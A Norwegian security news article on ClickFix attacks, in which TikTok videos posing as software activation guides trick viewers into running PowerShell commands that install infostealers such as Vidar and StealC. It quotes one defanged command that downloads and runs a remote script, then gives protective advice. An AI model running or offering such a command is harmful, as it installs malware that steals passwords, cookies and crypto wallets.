Cyberkriminelle utnytter TikTok-videoer til å spre infostealere ved hjelp av en metode kjent som ClickFix-angrep. Disse ondsinnede klippene utgir seg for å være aktiverings- eller feilsøkingsguider for populære programmer som Windows, Spotify og Microsoft Office. I stedet for å fikse noe som helst, lurer de brukerne til å kjøre PowerShell-kommandoer som installerer skadevare som stjeler informasjon.
Trenden viser hvor enkelt kriminelle kan bruke sosiale medier til å nå et globalt publikum og omgå tradisjonelle sikkerhetsbarrierer.
Slik fungerer ClickFix-metoden
De falske TikTok-videoene instruerer seerne til å “aktivere” eller “fikse” programvare ved å kjøre bestemte kommandoer. Et typisk eksempel er:
iex (irm slmgr[.]win/photoshop)
Denne kommandoen laster ned et eksternt skript fra en ondsinnet server og kjører det umiddelbart. Når det aktiveres, installeres infostealere som Vidar og StealC, som henter ut lagrede passord, nettleserkaker, kryptolommebøker og systeminformasjon.
Angriperne utnytter nysgjerrighet og den tilsynelatende troverdigheten til instruksjonsvideoer. Den sosiale settingen gjør det mer sannsynlig at brukerne kopierer kommandoer uten å forstå risikoen.
Hvorfor ClickFix-angrep er effektive
TikToks anbefalingsalgoritme sprer slikt innhold raskt, noe som gir trusselaktører gratis synlighet. Formatet med korte videoer gjør at brukerne ofte handler impulsivt uten å stille spørsmål ved ektheten.
ClickFix-angrep utnytter denne atferden ved å bruke ett eneste kommando-klipp som kan kompromittere hele systemet. Når kommandoen kjøres, etablerer skadevaren seg permanent og lar angripere stjele sensitiv informasjon eller selge den på det mørke nettet.
Sikkerhetsrisikoer og advarsler
Eksperter advarer brukere mot å følge guider som tilbyr gratis aktivering, “crackede” programmer eller lisensomgåelser. Videoer eller kommentarfelt som ber brukere om å kjøre PowerShell-, Terminal- eller shell-kommandoer er tydelige advarselstegn.
Organisasjoner bør blokkere skriptkjøring fra uverifiserte kilder og overvåke nettverkstrafikk for mistenkelige tilkoblinger til ukjente domener.
Slik beskytter du deg
- Last alltid ned programvare fra offisielle nettsteder.
- Ikke kopier PowerShell- eller terminalkommandoer fra sosiale medier.
- Bruk endepunktsbeskyttelse som oppdager skriptbaserte trusler.
- Lær opp ansatte i sosial manipulering og risikoen ved viralt videoinnhold.
- Rapporter ondsinnede TikTok-kontoer til plattformens moderatorer.
Konklusjon
Økningen av TikTok-videoer som sprer infostealere gjennom ClickFix-angrep viser hvordan underholdningsplattformer blir kraftige verktøy for cyberkriminalitet. Angripere utnytter brukernes tillit og plattformenes rekkevidde til å levere skadevare via enkle kommandoer. Å være årvåken, verifisere kilder og unngå mistenkelige “aktiveringsguider” er avgjørende tiltak for å beskytte enheter mot denne voksende formen for sosial manipulasjon.
0 svar til “TikTok-videor sprider infostealers i ClickFix-attacker”